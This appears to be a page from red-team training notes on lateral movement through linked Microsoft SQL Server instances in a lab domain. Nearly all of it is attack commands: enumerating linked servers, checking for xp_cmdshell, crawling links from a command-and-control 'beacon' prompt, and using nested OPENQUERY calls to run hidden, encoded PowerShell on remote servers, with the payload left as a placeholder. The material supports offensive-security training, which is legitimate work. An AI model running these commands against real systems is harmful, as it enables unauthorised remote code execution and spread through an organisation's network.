Lateral Movement

SELECT * FROM master..sysservers;

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell'''); 

beacon> powershell Get-SQLServerLinkCrawl -Instance "srv-1.dev.cyberbotic.io,1433"

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select * from openquery("sql01.zeropointsecurity.local", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')

PreviousCommand Execution NextPrivilege Escalation

Last updated 2 years ago